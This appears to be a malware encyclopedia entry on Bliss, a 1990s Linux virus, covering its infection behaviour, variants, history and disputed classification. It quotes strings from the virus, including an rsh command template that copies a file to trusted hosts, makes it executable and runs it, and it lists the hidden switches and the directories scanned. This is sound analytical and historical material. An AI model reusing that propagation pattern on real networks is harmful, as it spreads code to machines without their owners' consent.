Bliss | |
---|---|
Type | File virus |
Creator | "electric eel" |
Date Discovered | 1997.01.31 |
Place of Origin | |
Source Language | |
Platform | Linux |
File Type(s) | ELF executables |
Infection Length | 17,892 bytes |
Reported Costs |
Bliss is the second Linux virus. Its classification was contraversial with some people calling it a trojan, others a worm and most others calling it a virus.
Behavior
When executed, Bliss looks for ELF executables to which it has write access. It creates the directory /tmp/.bliss, where it will store some system binaries. When it finds one, it overwrites the file. The file's functionality will be partially or completely lost. It looks for other machines to infect by reading the /etc/hosts.equiv file, a file on Linux and most other Unix-based systems that lists other trustworthy computers on the network. Bliss will remove itself if an infected file is executed with the —bliss-disinfect-files-please switch.
The virus contains the following text:
dedicated to rkd
infected by bliss
skipping, infected with same vers or different type
replacing older version
replacing ourselves with newer version
infect() returning success
successfully (i hope) disinfected
rsh%s%s %s 'cat>%s;chmod 777 %s;%s;rm -f %s'
doing do_worm_stuff()
/etc/hosts.equiv
Compiled on Sep 28 1996 at 22:24:03
Written by electric eel.
help? hah! read the source!
bliss was run %d sex ago, rep_wait=%d
/usr/spool/news
GCC: (GNU) 2.7.2.l.2
Variants
There was a second variant of Bliss that is 18,604 bytes long. It is a prepender rather than an overwriter. Then the file is executed, the original program is extracted to the /tmp directory under the process ID name with the prefix ".bliss-tmp." added to it. Infected files will run correctly, though shell scripts may complain about them. It uses the /tmp/.bliss to clean up infected files if the correct command is issued. When files are executed with the argument —bliss-, the user may choose between these relatively self-descriptive options:
- uninfect-files-please, disinfect-files-please
- dont-run-original, just-run-bliss, just-run-virus
- dont-run-virus, dont-run-bliss, just-run-original
- force-worm-stuff
- exec
- infect-file <file-list>
- version
- help
It also checks the following directories for executables:
- $HOME/bin
- $PATH
- each getpwent()/bin
- /usr/spool/news
- /var/spool/news
- /dos
- /proc
- /cdrom
- /
History
An "alpha" version of Bliss is known to have existed as far back as the 29th of September 1996, when its code was posted to comp.security.unix, alt.comp.virus and comp.os.linux.misc. The first reported binary infection was on the 31st of January 1997. On the 5th of February, the creator posted to comp.security.unix that he was concerned that his creation may be loose. McAfee Antivirus claimed credit for discovering the virus on the same day and the press ran with that story, though they actually received the information from the Linux Security mailing list.
While today it seems to be generally agreed that Bliss is a virus, but when it came out, its classification was a source of controversy. Often devotees of a platform that is known for its security (particularly when compared to Microsoft Windows) will claim that a certain malware is something different from what others are reporting it as, like the argument over the classification of the Oompa worm. One analyst noted the fact that the user has to run the program (as root no less) in order for it to spread as proof that it is a trojan. Proponents of the virus classification cite the fact that it spreads at all for it being a virus. Others thought it was a worm, as it could spread over networks. Our own classification is virus, since it spreads and it does so with some sort of parasitic relationship to programs, regardless of how much user involvement there is or whether or not it can spread over a network.
Sources
Mikko Hypponen. F-Secure Antivirus, F-Secure Virus Descriptions : Linux/Bliss.
University of Paderborn, Bliss, a Linux "virus", Including links in the Paderborn site. 1997